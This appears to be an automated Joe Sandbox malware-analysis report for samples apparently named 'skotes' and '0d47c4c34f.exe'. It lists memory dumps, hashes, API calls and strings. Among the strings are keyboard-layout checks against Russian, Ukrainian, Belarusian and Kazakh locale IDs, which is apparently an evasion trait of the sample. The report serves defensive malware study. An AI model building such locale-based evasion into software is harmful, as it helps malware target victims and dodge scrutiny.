Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3434714a6c6360ccb7d3adb1a6475e25c9f5e3e9a80f64fee46d6ec7287b0cc2
Instruction ID: 371e6f7cbda5a2cd6f6ab921b854f8d24874ac682be8dde62c166e71ea443134
Opcode Fuzzy Hash: 3434714a6c6360ccb7d3adb1a6475e25c9f5e3e9a80f64fee46d6ec7287b0cc2
Instruction Fuzzy Hash: 4D216A32B412099BEB18DB68DC99F6DBB65EBD5314F20421DE404973D4C7399A808753

Function 009FD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009FA813,00000001,00000364,00000006,000000FF,?,009FEE3F,?,00000004,00000000,?,?), ref: 009FD870

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 339d6105037baaff6bdf2ab04d99938f0e32a40205a58c8fd8112a6a43144ee4
Instruction ID: c34f753a44a947cce649f2f8e1c07e22d7f972e6d0ff583a6f6c260e403e17db
Opcode Fuzzy Hash: 339d6105037baaff6bdf2ab04d99938f0e32a40205a58c8fd8112a6a43144ee4
Instruction Fuzzy Hash: 6EF0823264722DA6EB21BA76DC01B7B7B5F9F817F0B298521FF14A7191DA20DC0187E1

Analysis Process: 0d47c4c34f.exePID: 8708, Parent PID: 8536COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	745
Total number of Limit Nodes:	11

Executed Functions

Function 000E645B Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,000E645A,?,?,?,?,?,000E74AE), ref: 000E6496

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 209aba4a42a1f8b5660ed3287cf188fc6b295dc18f36240f7f4610ca056c0046
Instruction ID: f79dbcb5afe63be12a606fbd7e0d676c2d1f09c91c2fabc657e4a1237bfcd817
Opcode Fuzzy Hash: 209aba4a42a1f8b5660ed3287cf188fc6b295dc18f36240f7f4610ca056c0046
Instruction Fuzzy Hash: 3EE086701415886ECE297B16DC099893B9AEFA1390F044410FC085B272CB76EC82C981

Function 000B5B20 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 443
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p.gc, xrefs: 000B5904, 000B5B34, 000B5C77, 000B5DF6, 000B5F4B, 000B65C7
00000419, xrefs: 000B5FA8
00000422, xrefs: 000B5FD9
p.gc, xrefs: 000B5CC8, 000B5D10, 000B5CD5, 000B5DF0
Keyboard Layout\Preload, xrefs: 000B5F64
0000043f, xrefs: 000B603B
00000423, xrefs: 000B600A

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$p.gc$p.gc
API String ID: 0-3437345632
Opcode ID: 0c70567b82c03759c7e6c52a63252677b511bd369788ba5cabc1131a2ef4e815
Instruction ID: 5ed50b3d7599ad7d6e098bf173e5518e3d0af3a336a996f17a01ea1a49fc180b
Opcode Fuzzy Hash: 0c70567b82c03759c7e6c52a63252677b511bd369788ba5cabc1131a2ef4e815
Instruction Fuzzy Hash: 79F1A37090025CAFEB24DF54CC89BEDBBB9EF44304F5046A9E508A7282DB759B84CF95

Function 000B7D00 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000B7EA3

Strings

p.gc, xrefs: 000B7D2B

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: p.gc
API String ID: 1721193555-2259671528
Opcode ID: 32d10b5dce5e13b95b4b22d6f53b8c4c8a0b1a746d66ce0202467b598548ce27
Instruction ID: 14159c79f1c66157e7745be148c34b095e191b89cfa5e822a0f99dc70284834b
Opcode Fuzzy Hash: 32d10b5dce5e13b95b4b22d6f53b8c4c8a0b1a746d66ce0202467b598548ce27
Instruction Fuzzy Hash: C8D1F570E006189BDF28BB28CD4B7DD7B71AB45314F54829CE4196B3D2DB358E948BD2

Function 000ED6EF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000EA6D3,00000001,00000364,00000006,000000FF,?,000EECFF,?,00000004,00000000,?,?), ref: 000ED730

Strings

@2, xrefs: 000ED73C

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
